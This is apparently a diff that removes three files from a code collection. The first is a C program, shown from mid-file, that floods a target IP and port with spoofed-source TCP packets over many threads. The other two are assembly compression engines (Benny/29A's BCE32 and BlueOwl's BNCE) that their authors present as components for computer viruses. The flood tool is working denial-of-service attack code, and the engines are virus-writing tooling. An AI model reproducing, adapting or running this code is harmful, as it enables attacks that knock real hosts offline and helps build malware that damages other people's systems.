|
|
||||||
tcph->ack_seq = rand();
|
|
||||||
tcph->res2 = 0;
|
|
||||||
tcph->doff = 5;
|
|
||||||
tcph->psh = 1;
|
|
||||||
tcph->ack = 1;
|
|
||||||
tcph->urg = 1;
|
|
||||||
tcph->window = rand();
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->urg_ptr = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
void *flood(void *par1)
|
|
||||||
{
|
|
||||||
char *td = (char *)par1;
|
|
||||||
char datagram[MAX_PACKET_SIZE];
|
|
||||||
struct iphdr *iph = (struct iphdr *)datagram;
|
|
||||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
|
||||||
|
|
||||||
struct sockaddr_in sin;
|
|
||||||
sin.sin_family = AF_INET;
|
|
||||||
sin.sin_port = htons(floodport);
|
|
||||||
sin.sin_addr.s_addr = inet_addr(td);
|
|
||||||
|
|
||||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
|
||||||
if(s < 0){
|
|
||||||
fprintf(stderr, "Could not open raw socket.\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
|
||||||
setup_ip_header(iph);
|
|
||||||
setup_tcp_header(tcph);
|
|
||||||
|
|
||||||
tcph->dest = htons(floodport);
|
|
||||||
|
|
||||||
iph->daddr = sin.sin_addr.s_addr;
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
|
|
||||||
int tmp = 1;
|
|
||||||
const int *val = &tmp;
|
|
||||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
|
||||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
init_rand(time(NULL));
|
|
||||||
register unsigned int i;
|
|
||||||
i = 0;
|
|
||||||
while(1){
|
|
||||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
|
||||||
|
|
||||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
|
||||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
|
||||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
|
||||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
|
||||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
|
||||||
tcph->check = 0;
|
|
||||||
tcph->check = tcpcsum(iph, tcph);
|
|
||||||
|
|
||||||
pps++;
|
|
||||||
if(i >= limiter)
|
|
||||||
{
|
|
||||||
i = 0;
|
|
||||||
usleep(sleeptime);
|
|
||||||
}
|
|
||||||
i++;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
int main(int argc, char *argv[ ])
|
|
||||||
{
|
|
||||||
if(argc < 6){
|
|
||||||
fprintf(stderr, "Invalid parameters!\n");
|
|
||||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
|
||||||
exit(-1);
|
|
||||||
}
|
|
||||||
|
|
||||||
fprintf(stdout, "Setting up Sockets...\n");
|
|
||||||
|
|
||||||
int num_threads = atoi(argv[3]);
|
|
||||||
floodport = atoi(argv[2]);
|
|
||||||
int maxpps = atoi(argv[4]);
|
|
||||||
limiter = 0;
|
|
||||||
pps = 0;
|
|
||||||
pthread_t thread[num_threads];
|
|
||||||
|
|
||||||
int multiplier = 20;
|
|
||||||
|
|
||||||
int i;
|
|
||||||
for(i = 0;i<num_threads;i++){
|
|
||||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
|
||||||
}
|
|
||||||
fprintf(stdout, "Starting Flood...\n");
|
|
||||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
|
||||||
{
|
|
||||||
usleep((1000/multiplier)*1000);
|
|
||||||
if((pps*multiplier) > maxpps)
|
|
||||||
{
|
|
||||||
if(1 > limiter)
|
|
||||||
{
|
|
||||||
sleeptime+=100;
|
|
||||||
} else {
|
|
||||||
limiter--;
|
|
||||||
}
|
|
||||||
} else {
|
|
||||||
limiter++;
|
|
||||||
if(sleeptime > 25)
|
|
||||||
{
|
|
||||||
sleeptime-=25;
|
|
||||||
} else {
|
|
||||||
sleeptime = 0;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
pps = 0;
|
|
||||||
}
|
|
||||||
|
|
||||||
return 0;
|
|
||||||
}
|
|
@ -1,416 +0,0 @@
|
|||||||
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
|
|
||||||
; ÚÄ Benny's Compression Engine for Win32 Ä¿ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
|
|
||||||
; ³ by ³ ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
|
|
||||||
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄ Benny / 29A ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
|
|
||||||
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;Hello everybody,
|
|
||||||
;
|
|
||||||
;let me introduce my second compression engine for Win32 enviroment (u can
|
|
||||||
;find my first engine in Win32.Benny and Win98.Milennium). This engine
|
|
||||||
;worx on "compressin' bit groups" base. When I started to write this stuff,
|
|
||||||
;i wanted to write engine, that would work on Huffmann base. Then I decided
|
|
||||||
;it's not needed to implement this complicated algorithm here, coz I wanna
|
|
||||||
;be this engine small and effective.
|
|
||||||
;
|
|
||||||
;Not only this is truth. This engine is very fast, very small (only 478 bytes)
|
|
||||||
;and has implemented my special compression algorithm, that is simple and has
|
|
||||||
;very, ehrm, let's call it "interesting" compression ratio X-D.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;So how does it work ?
|
|
||||||
;======================
|
|
||||||
;
|
|
||||||
;I said, this engine worx on "compressin' bit groups" base. What does it mean ?
|
|
||||||
;Bit group (as I call it) is group of two bits. U know, every byte has 8 bits.
|
|
||||||
;
|
|
||||||
;Example: byte 9Ah group0 group1 group2 group3
|
|
||||||
; 10011010 ===> 10 10 01 10
|
|
||||||
;
|
|
||||||
;As u can see, every byte has 4 bit groups and I said, it compresses
|
|
||||||
;bit groups. Heh, u think i'm crazy when im tryin' to compress
|
|
||||||
;two bits, yeah :?)
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;This engine will (on the beginnin') calculate, which bit group has
|
|
||||||
;the biggest count of repetency, which second biggest, etc...
|
|
||||||
;
|
|
||||||
;Example: group count
|
|
||||||
; 00 ===> 74
|
|
||||||
; 01 ===> 32
|
|
||||||
; 10 ===> 12
|
|
||||||
; 11 ===> 26
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;That's not all. It has to sort items to know, which group has the biggest
|
|
||||||
;count. I decided it's best to use "bubble sort algorithm". Then there isn't
|
|
||||||
;any problem to use "our algorithm".
|
|
||||||
|
|
||||||
;Look at this table, when in first column r sorted groups and in second
|
|
||||||
;comlumn r <another> bits, which will represent new compressed data.
|
|
||||||
;
|
|
||||||
;Sorted by count: 1. ===> 1
|
|
||||||
; 2. ===> 00
|
|
||||||
; 3. ===> 010
|
|
||||||
; 4. ===> 011
|
|
||||||
;
|
|
||||||
;Finally, engine will replace bit groups with these bits.
|
|
||||||
;Gewd thing on this algorithm is that there aren't needed same bytes to have
|
|
||||||
;good compression ratio, but only some bits.
|
|
||||||
;So now u know whole secret of my compression algorithm. U also know, why
|
|
||||||
;I said, it has "interesting compression ratio". Look at the table and u will
|
|
||||||
;see, what type of files can we strongly compress. They r both of binaries
|
|
||||||
;and texts, but not every binaries or texts can be compressed as well as otherz.
|
|
||||||
;We can compress some binaries again with the same or better ratio. Why ?
|
|
||||||
;Imagine, u have file with 1000x 0x0s. After compression we have 125x 0xFFs, that
|
|
||||||
;can be compressed again. Some files can be after compression (negative even -
|
|
||||||
;file is bigger) compressed again with positive compression (file is smaller).
|
|
||||||
;Heh, crazy, isn't it ? X-DDD.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;How can I use BCE32 in my virus ?
|
|
||||||
;==================================
|
|
||||||
;
|
|
||||||
;BCE32 is placed in two procedures called BCE32_Compress and BCE32_Decompress.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;a) BCE32_Compress:
|
|
||||||
;-------------------
|
|
||||||
;Input state:
|
|
||||||
; 1) ESI register - pointer to data, which will be compressed
|
|
||||||
; 2) EDI register - pointer to memory, where will be placed compressed data
|
|
||||||
; 3) ECX register - number of bytes to compress + 1 (do not forget "+ 1" !)
|
|
||||||
; 4) EBX register - work memory (16 bytes)
|
|
||||||
; 5) EDX register - work memory (16 bytes). MUST NOT be same as EBX !
|
|
||||||
;
|
|
||||||
; call BCE32_Compress
|
|
||||||
;
|
|
||||||
;Output state:
|
|
||||||
; 1) EAX register - new size of compressed data
|
|
||||||
; 2) CF set, if negative compression
|
|
||||||
; 3) Other registers r preserved (except FLAGS)
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;b) BCE32_Decompress:
|
|
||||||
;---------------------
|
|
||||||
;Input state:
|
|
||||||
; 1) ESI register - pointer to compressed data
|
|
||||||
; 2) EDI register - pointer to memory, where will be placed decompressed data
|
|
||||||
; 3) ECX register - number of bytes to decompress (EAX value returned by
|
|
||||||
; BCE32_Compress) - 1 (do not forget "- 1" !)
|
|
||||||
;
|
|
||||||
; call BCE32_Decompress
|
|
||||||
;
|
|
||||||
;Output state:
|
|
||||||
; 1) All registers r preserved
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;WARNING: Be sure, u have enought memory for case of negative compression.
|
|
||||||
;NOTE: U can compress (in some special cases) already compressed data.
|
|
||||||
; For this purpose exists output parameters EAX and CF.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;Do u like this (or my another work) ?
|
|
||||||
;======================================
|
|
||||||
;
|
|
||||||
;Gimme know. If u have some notes or commentz for this, for another work,
|
|
||||||
;or if u simply like it, mail me to benny@post.cz. Thanx.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;Don't u like it ?
|
|
||||||
;==================
|
|
||||||
;
|
|
||||||
;Fuck u.
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;(c) by Benny/29A May 1999.
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
BCE32_Compress Proc ;compression procedure
|
|
||||||
pushad ;save all regs
|
|
||||||
|
|
||||||
;stage 1
|
|
||||||
pushad ;and again
|
|
||||||
create_table:
|
|
||||||
push ecx ;save for l8r usage
|
|
||||||
push 4
|
|
||||||
pop ecx ;ECX = 4
|
|
||||||
lodsb ;load byte to AL
|
|
||||||
l_table:push eax ;save it
|
|
||||||
xor edx, edx ;EDX = 0
|
|
||||||
and al, 3 ;this stuff will separate and test
|
|
||||||
je st_end ;bit groups
|
|
||||||
cmp al, 2
|
|
||||||
je st2
|
|
||||||
cmp al, 3
|
|
||||||
je st3
|
|
||||||
st1: inc edx ;01
|
|
||||||
jmp st_end
|
|
||||||
st2: inc edx ;10
|
|
||||||
inc edx
|
|
||||||
jmp st_end
|
|
||||||
st3: mov dl, 3 ;11
|
|
||||||
st_end: inc dword ptr [ebx+4*edx] ;increment count in table
|
|
||||||
pop eax
|
|
||||||
ror al, 2 ;next bit group
|
|
||||||
loop l_table
|
|
||||||
pop ecx ;restore number of bytes
|
|
||||||
loop create_table ;next byte
|
|
||||||
|
|
||||||
push 4 ;this will check for same numbers
|
|
||||||
pop ecx ;ECX = 4
|
|
||||||
re_t: cdq ;EDX = 0
|
|
||||||
t_loop: mov eax, [ebx+4*edx] ;load DWORD
|
|
||||||
inc dword ptr [ebx+4*edx] ;increment it
|
|
||||||
cmp eax, [ebx] ;test for same numbers
|
|
||||||
je _inc_ ;...
|
|
||||||
cmp eax, [ebx+4] ;...
|
|
||||||
je _inc_ ;...
|
|
||||||
cmp eax, [ebx+8] ;...
|
|
||||||
je _inc_ ;...
|
|
||||||
cmp eax, [ebx+12] ;...
|
|
||||||
jne ninc_ ;...
|
|
||||||
_inc_: inc dword ptr [ebx+4*edx] ;same, increment it
|
|
||||||
inc ecx ;increment counter (check it in next turn)
|
|
||||||
ninc_: cmp dl, 3 ;table overflow ?
|
|
||||||
je re_t ;yeah, once again
|
|
||||||
inc edx ;increment offset to table
|
|
||||||
loop t_loop ;loop
|
|
||||||
popad ;restore regs
|
|
||||||
|
|
||||||
;stage 2
|
|
||||||
pushad ;save all regs
|
|
||||||
mov esi, ebx ;get pointer to table
|
|
||||||
push 3
|
|
||||||
pop ebx ;EBX = 3
|
|
||||||
mov ecx, ebx ;ECX = 3
|
|
||||||
rep_sort: ;bubble sort = the biggest value will
|
|
||||||
;always "bubble up", so we know number
|
|
||||||
;steps
|
|
||||||
push ecx ;save it
|
|
||||||
mov ecx, ebx ;set pointerz
|
|
||||||
mov edi, edx ;...
|
|
||||||
push edx ;save it
|
|
||||||
lodsd ;load DWORD (count)
|
|
||||||
mov edx, eax ;save it
|
|
||||||
sort: lodsd ;load next
|
|
||||||
cmp eax, edx ;is it bigger
|
|
||||||
jb noswap ;no, store it
|
|
||||||
xchg eax, edx ;yeah, swap DWORDs
|
|
||||||
noswap: stosd ;store it
|
|
||||||
loop sort ;next DWORD
|
|
||||||
mov eax, edx ;biggest in EDX, swap it
|
|
||||||
stosd ;and store
|
|
||||||
lea esi, [edi-16] ;get back pointer
|
|
||||||
pop edx ;restore regs
|
|
||||||
pop ecx
|
|
||||||
loop rep_sort ;and try next DWORD
|
|
||||||
popad
|
|
||||||
|
|
||||||
;stage 3
|
|
||||||
pushad ;save all regs
|
|
||||||
xor eax, eax ;EAX = 0
|
|
||||||
push eax ;save it
|
|
||||||
push 4
|
|
||||||
pop ecx ;ECX = 4
|
|
||||||
n_search:
|
|
||||||
push edx ;save regs
|
|
||||||
push ecx
|
|
||||||
lea esi, [ebx+4*eax] ;get pointer to table
|
|
||||||
push eax ;store reg
|
|
||||||
lodsd ;load DWORD to EAX
|
|
||||||
push 3
|
|
||||||
pop ecx ;ECX = 3
|
|
||||||
mov edi, ecx ;set pointerz
|
|
||||||
search: mov esi, edx
|
|
||||||
push eax ;save it
|
|
||||||
lodsd ;load next
|
|
||||||
mov ebp, eax
|
|
||||||
pop eax
|
|
||||||
cmp eax, ebp ;end ?
|
|
||||||
je end_search
|
|
||||||
dec edi ;next search
|
|
||||||
add edx, 4
|
|
||||||
loop search
|
|
||||||
end_search:
|
|
||||||
pop eax ;and next step
|
|
||||||
inc eax
|
|
||||||
pop ecx
|
|
||||||
pop edx
|
|
||||||
add [esp], edi
|
|
||||||
rol byte ptr [esp], 2
|
|
||||||
loop n_search
|
|
||||||
pop [esp.Pushad_ebx] ;restore all
|
|
||||||
popad ;...
|
|
||||||
|
|
||||||
;stage 4
|
|
||||||
xor ebp, ebp ;EBP = 0
|
|
||||||
xor edx, edx ;EDX = 0
|
|
||||||
mov [edi], bl ;store decryption key
|
|
||||||
inc edi ;increment pointer
|
|
||||||
next_byte:
|
|
||||||
xor eax, eax ;EAX = 0
|
|
||||||
push ecx
|
|
||||||
lodsb ;load next byte
|
|
||||||
push 4
|
|
||||||
pop ecx ;ECX = 4
|
|
||||||
next_bits:
|
|
||||||
push ecx ;store regs
|
|
||||||
push eax
|
|
||||||
and al, 3 ;separate bit group
|
|
||||||
|
|
||||||
push ebx ;compare with next group
|
|
||||||
and bl, 3
|
|
||||||
cmp al, bl
|
|
||||||
pop ebx
|
|
||||||
je cb0
|
|
||||||
|
|
||||||
push ebx ;compare with next group
|
|
||||||
ror bl, 2
|
|
||||||
and bl, 3
|
|
||||||
cmp al, bl
|
|
||||||
pop ebx
|
|
||||||
je cb1
|
|
||||||
|
|
||||||
push ebx ;compare with next group
|
|
||||||
ror bl, 4
|
|
||||||
and bl, 3
|
|
||||||
cmp al, bl
|
|
||||||
pop ebx
|
|
||||||
je cb2
|
|
||||||
|
|
||||||
push 0 ;store bit 0
|
|
||||||
call copy_bit
|
|
||||||
push 1 ;store bit 1
|
|
||||||
call copy_bit
|
|
||||||
cb0: push 1 ;store bit 1
|
|
||||||
end_cb1:call copy_bit
|
|
||||||
pop eax
|
|
||||||
pop ecx
|
|
||||||
ror al, 2
|
|
||||||
loop next_bits ;next bit
|
|
||||||
pop ecx
|
|
||||||
loop next_byte ;next byte
|
|
||||||
mov eax, edi ;save new size
|
|
||||||
sub eax, [esp.Pushad_edi] ;...
|
|
||||||
mov [esp.Pushad_eax], eax ;...
|
|
||||||
popad ;restore all regs
|
|
||||||
cmp eax, ecx ;test for negative compression
|
|
||||||
jb c_ok ;positive compression
|
|
||||||
stc ;clear flag
|
|
||||||
ret ;and quit
|
|
||||||
c_ok: clc ;negative compression, set flag
|
|
||||||
ret ;and quit
|
|
||||||
cb1: push 0 ;store bit 0
|
|
||||||
end_cb2:call copy_bit
|
|
||||||
push 0 ;store bit 0
|
|
||||||
jmp end_cb1
|
|
||||||
cb2: push 0 ;store bit 0
|
|
||||||
call copy_bit
|
|
||||||
push 1 ;store bit 1
|
|
||||||
jmp end_cb2
|
|
||||||
copy_bit:
|
|
||||||
mov eax, ebp ;get byte from EBP
|
|
||||||
shl al, 1 ;make space for next bit
|
|
||||||
or al, [esp+4] ;set bit
|
|
||||||
cbit: inc edx ;increment counter
|
|
||||||
cmp dl, 8 ;byte full ?
|
|
||||||
jne n_byte ;no, continue
|
|
||||||
stosb ;yeah, store byte
|
|
||||||
xor eax, eax ;and prepare next one
|
|
||||||
cdq ;...
|
|
||||||
n_byte: mov ebp, eax ;save back byte
|
|
||||||
ret Pshd ;quit from procedure with one parameter on stack
|
|
||||||
db '[BCE32]', 0 ;little signature
|
|
||||||
BCE32_Compress EndP ;end of compression procedure
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
BCE32_Decompress Proc ;decompression procedure
|
|
||||||
pushad ;save all regs
|
|
||||||
xor eax, eax ;EAX = 0
|
|
||||||
xor ebp, ebp ;EBP = 0
|
|
||||||
cdq ;EDX = 0
|
|
||||||
|
|
||||||
lodsb ;load decryption key
|
|
||||||
push eax ;store it
|
|
||||||
lodsb ;load first byte
|
|
||||||
push 8 ;store 8
|
|
||||||
push edx ;store 0
|
|
||||||
d_bits: push ecx ;store ECX
|
|
||||||
|
|
||||||
test al, 80h ;test for 1
|
|
||||||
jne db0
|
|
||||||
test al, 0c0h ;test for 00
|
|
||||||
je db1
|
|
||||||
test al, 0a0h ;test for 010
|
|
||||||
je db2
|
|
||||||
mov cl, 6 ;its 011
|
|
||||||
jmp tb2
|
|
||||||
|
|
||||||
testb: test bl, 1 ;is it 1 ?
|
|
||||||
jne p1
|
|
||||||
push 0 ;no, store 0
|
|
||||||
_tb_: mov eax, ebp ;load byte to EAX
|
|
||||||
or al, [esp] ;set bit
|
|
||||||
ror al, 1 ;and make space for next one
|
|
||||||
call cbit ;end of procedure
|
|
||||||
ret ;...
|
|
||||||
p1: push 1 ;store 1
|
|
||||||
jmp _tb_ ;and continue
|
|
||||||
|
|
||||||
db0: xor cl, cl ;CL = 0
|
|
||||||
mov byte ptr [esp+4], 1 ;store 1
|
|
||||||
testbits:
|
|
||||||
push eax ;store it
|
|
||||||
push ebx ;...
|
|
||||||
mov ebx, [esp+20] ;load parameter
|
|
||||||
ror bl, cl ;shift to next bit group
|
|
||||||
call testb ;test bit
|
|
||||||
ror bl, 1 ;next bit
|
|
||||||
call testb ;test it
|
|
||||||
pop ebx ;restore regs
|
|
||||||
pop eax
|
|
||||||
|
|
||||||
mov ecx, [esp+4] ;load parameter
|
|
||||||
bcopy: cmp byte ptr [esp+8], 8 ;8. bit ?
|
|
||||||
jne dnlb ;nope, continue
|
|
||||||
mov ebx, eax ;load next byte
|
|
||||||
lodsb
|
|
||||||
xchg eax, ebx
|
|
||||||
mov byte ptr [esp+8], 0 ;and nulify parameter
|
|
||||||
dec dword ptr [esp] ;decrement parameter
|
|
||||||
dnlb: shl al, 1 ;next bit
|
|
||||||
test bl, 80h ;is it 1 ?
|
|
||||||
je nb ;no, continue
|
|
||||||
or al, 1 ;yeah, set bit
|
|
||||||
nb: rol bl, 1 ;next bit
|
|
||||||
inc byte ptr [esp+8] ;increment parameter
|
|
||||||
loop bcopy ;and align next bits
|
|
||||||
pop ecx ;restore ECX
|
|
||||||
inc ecx ;test flags
|
|
||||||
dec ecx ;...
|
|
||||||
jns d_bits ;if not sign, jump
|
|
||||||
|
|
||||||
pop eax ;delete pushed parameters
|
|
||||||
pop eax ;...
|
|
||||||
pop eax ;...
|
|
||||||
popad ;restore all regs
|
|
||||||
ret ;and quit
|
|
||||||
|
|
||||||
db1: mov cl, 2 ;2. bit in decryption key
|
|
||||||
mov [esp+4], cl ;2 bit wide
|
|
||||||
jmp testbits ;test bits
|
|
||||||
db2: mov cl, 4 ;4. bit
|
|
||||||
tb2: mov byte ptr [esp+4], 3 ;3 bit wide
|
|
||||||
jmp testbits ;test bits
|
|
||||||
BCE32_Decompress EndP ;end of decompression procedure
|
|
Binary file not shown.
@ -1,198 +0,0 @@
|
|||||||
|
|
||||||
; BNCE - BlueOwls Nibble Compression Engine
|
|
||||||
; *****************************************
|
|
||||||
;
|
|
||||||
; Introduction
|
|
||||||
; ************
|
|
||||||
;
|
|
||||||
; I made this engine for virusses which want to use some algorithm to make
|
|
||||||
; themselves or something else smaller (obviously), but i wanted the
|
|
||||||
; algorithm to be small too, because if it isn't it would have little use
|
|
||||||
; for virusses. In this case, I tried to make the decompressor as small as
|
|
||||||
; possible, and let the compressor do most of the work.
|
|
||||||
;
|
|
||||||
; How it works
|
|
||||||
; ************
|
|
||||||
;
|
|
||||||
; Every byte has 4 nibbles and these can be compressed. The compression is
|
|
||||||
; done by counting the number of nibbles in the entire data and change
|
|
||||||
; the nibble sizes accordingly. The most common of the four possible
|
|
||||||
; nibbles will be compressed, #2 will stay the same size and #3 & #4 will
|
|
||||||
; be expanded. This means that as long as the number #1s > the numbers
|
|
||||||
; #3+#4 compression occurs, otherwise the data will be expanded. The
|
|
||||||
; maximum reducement is 50%, and the maximum enlargement is 112,5%.
|
|
||||||
;
|
|
||||||
; Notes
|
|
||||||
; *****
|
|
||||||
;
|
|
||||||
; - The bnce_compress and bnce_decompress are not in any way dependent on
|
|
||||||
; each other, and both do not use any (external) data, you can run them
|
|
||||||
; without the write flag set.
|
|
||||||
; - A small optimization is possible for the decryptor if you like to
|
|
||||||
; decrypt only one thing with a static size with it; remove the (*)
|
|
||||||
; lines in the compressor and change the (@) lines in mov ecx, size;
|
|
||||||
; or push size, pop ecx. It will save one or three bytes in the
|
|
||||||
; decompressor, wow! :P
|
|
||||||
; - I have not encounterd any bugs, and the only errors could arrise from
|
|
||||||
; a faulty parameters; too small output buffers or corrupted compressed
|
|
||||||
; data fed to the decompressor. All which are not very likely.
|
|
||||||
; - In some extreme cases, already compressed data can be compressed again
|
|
||||||
; but this is only possible when the are a lot of same nibble repeaten-
|
|
||||||
; cies; for example: 1111b becomes 00b; and 00b becomes 0b. But it does
|
|
||||||
; not occur very often.
|
|
||||||
; - As the maximum enlargement is 112,5% I would at least allocate an
|
|
||||||
; output buffer of size *12 /10 if the data is not static.
|
|
||||||
;
|
|
||||||
; Last words
|
|
||||||
; **********
|
|
||||||
;
|
|
||||||
; I made this engine for fun and I had fun with it, I hope you like it and
|
|
||||||
; can use it in someway. Feel free to modify it to your needs. See Notes
|
|
||||||
; for more details. Anyway, I hope you like it and if you like to let
|
|
||||||
; me know something please do and send mail to xblueowl@hotmail.com.
|
|
||||||
|
|
||||||
; I compiled this stuff with FASM, but you should be able to assemble this
|
|
||||||
; with any popular assembler (MASM/TASM/FASM/NASM?) :).
|
|
||||||
|
|
||||||
; compress
|
|
||||||
; in: esi = ptr to data to compress
|
|
||||||
; ecx = size of data to compress
|
|
||||||
; edi = ptr to output buffer
|
|
||||||
; out: edi = end of data put in output buffer
|
|
||||||
; size: 165 bytes
|
|
||||||
|
|
||||||
bnce_compress: push 03020100h ; push table
|
|
||||||
push esi
|
|
||||||
push ecx
|
|
||||||
sub eax, eax ; eax = 0
|
|
||||||
cdq ; edx = 0
|
|
||||||
push eax ; 4 counters for the 4 existing nibbles
|
|
||||||
push eax
|
|
||||||
push eax
|
|
||||||
push eax
|
|
||||||
count_bytes: push ecx ; save no. of bytes
|
|
||||||
push 4
|
|
||||||
pop ecx ; ecx = 4
|
|
||||||
lodsb
|
|
||||||
count_bits: sub ah, ah
|
|
||||||
shl eax, 2 ; ah = first 2 bits
|
|
||||||
mov dl, ah ; dl = 2 bits
|
|
||||||
inc dword [esp+4+edx*4] ; count it
|
|
||||||
loop count_bits
|
|
||||||
pop ecx
|
|
||||||
loop count_bytes ; now the 4 counters are filled with the correct values
|
|
||||||
|
|
||||||
sort_again: sub ecx, ecx ; ecx = 0
|
|
||||||
mov esi, esp ; esi = ptr to first counter
|
|
||||||
lodsd ; esi = ptr to next counter
|
|
||||||
no_bubble: inc ecx
|
|
||||||
cmp ecx, 4
|
|
||||||
jz sort_done ; if no changes were made 4 times bubbling is done
|
|
||||||
lodsd ; eax = this counter; esi = next counter
|
|
||||||
cmp [esi-8], eax ; compare to previous counter
|
|
||||||
jae no_bubble ; if previous counter is bigger or equal make no change
|
|
||||||
xchg [esi-8], eax ; swap counters
|
|
||||||
mov [esi-4], eax
|
|
||||||
mov al, [esp+23+ecx]; swap nibbles
|
|
||||||
xchg al, [esp+24+ecx]
|
|
||||||
mov [esp+23+ecx], al
|
|
||||||
jmp sort_again ; start over
|
|
||||||
sort_done: add esp, 16 ; delete counters (only nibbles remaining)
|
|
||||||
|
|
||||||
pop ecx ; ecx = size of data
|
|
||||||
pop esi ; esi = start of data
|
|
||||||
|
|
||||||
pop eax ; eax = nibble table
|
|
||||||
push eax
|
|
||||||
shl eax, 6 ; move up table
|
|
||||||
stosd ; save table
|
|
||||||
|
|
||||||
mov eax, ecx ; eax = ecx = size of data (*)
|
|
||||||
stosd ; save it (*)
|
|
||||||
|
|
||||||
sub edx, edx ; edx = 0 (bits stored counter)
|
|
||||||
compress_loop: push ecx
|
|
||||||
push 4
|
|
||||||
pop ecx ; ecx = 4
|
|
||||||
lodsb
|
|
||||||
compress_bits: sub ebx, ebx ; ebx = 0
|
|
||||||
sub ah, ah ; ah = 0
|
|
||||||
shl eax, 2 ; ah = xxb
|
|
||||||
inc ebx ; 1 bit large; output is: 0b
|
|
||||||
cmp ah, [esp+0+4] ; is it main compress byte?
|
|
||||||
jz move_bits
|
|
||||||
mov bh, 10000000b ; output is: 10b
|
|
||||||
inc ebx ; 2 bit large
|
|
||||||
cmp ah, [esp+1+4]
|
|
||||||
jz move_bits
|
|
||||||
mov bh, 11000000b
|
|
||||||
inc ebx ; 3 bit large; output is: 110b
|
|
||||||
cmp ah, [esp+2+4]
|
|
||||||
jz move_bits
|
|
||||||
mov bh, 11100000b ; output is: 111b
|
|
||||||
move_bits: shl dh, 1 ; get a free bit in dh
|
|
||||||
shl bh, 1 ; carry on/of
|
|
||||||
adc dh, 0 ; add it to dh
|
|
||||||
inc edx
|
|
||||||
mov [edi], dh
|
|
||||||
cmp dl, 8
|
|
||||||
jnz no_store_bits
|
|
||||||
inc edi
|
|
||||||
sub edx, edx
|
|
||||||
no_store_bits: dec bl
|
|
||||||
jnz move_bits
|
|
||||||
loop compress_bits
|
|
||||||
pop ecx
|
|
||||||
loop compress_loop
|
|
||||||
|
|
||||||
mov cl, 8
|
|
||||||
sub cl, dl
|
|
||||||
rol dh, cl ; make sure last byte's bits are placed correctly
|
|
||||||
mov [edi], dh
|
|
||||||
inc edi
|
|
||||||
|
|
||||||
pop eax ; table not needed anymore
|
|
||||||
ret
|
|
||||||
|
|
||||||
; decompress
|
|
||||||
;
|
|
||||||
; in: esi = pointer to data to be decompressed
|
|
||||||
; edi = pointer to output buffer
|
|
||||||
; out: edi = pointer to end of output buffer
|
|
||||||
; size: 54 bytes
|
|
||||||
|
|
||||||
bnce_decompress:lodsd
|
|
||||||
push eax ; push decoder table
|
|
||||||
lodsd ; (@)
|
|
||||||
xchg eax, ecx ; ecx = size when uncompressed (@)
|
|
||||||
mov dl, 8 ; indicate new byte needed
|
|
||||||
decompress_next:push ecx
|
|
||||||
push 4 ; start byte reconstruction (4 nibbles remaining)
|
|
||||||
pop ecx
|
|
||||||
decompress_loop:sub ebx, ebx ; type = 0
|
|
||||||
push ecx
|
|
||||||
push 3 ; repeat 3 times if necessary
|
|
||||||
pop ecx
|
|
||||||
find_type: cmp dl, 8 ; next byte needed?
|
|
||||||
jnz dont_fill
|
|
||||||
sub edx, edx ; clear bit-counter
|
|
||||||
lodsb ; load new byte
|
|
||||||
dont_fill: inc edx ; 1 bit is used from byte
|
|
||||||
shl al, 1 ; get the bit
|
|
||||||
jnc dmove_bits ; if it is off, type is found
|
|
||||||
inc ebx ; type ++
|
|
||||||
loop find_type ; repeat
|
|
||||||
dmove_bits: pop ecx ; restore ecx (stored bit counter)
|
|
||||||
mov dh, al ; save al
|
|
||||||
mov al, [esp+4+ebx] ; get appropiate bits
|
|
||||||
shl eax, 2 ; add bits to ah
|
|
||||||
mov al, dh ; restore al
|
|
||||||
loop decompress_loop ; if byte is not ready to be put, go on
|
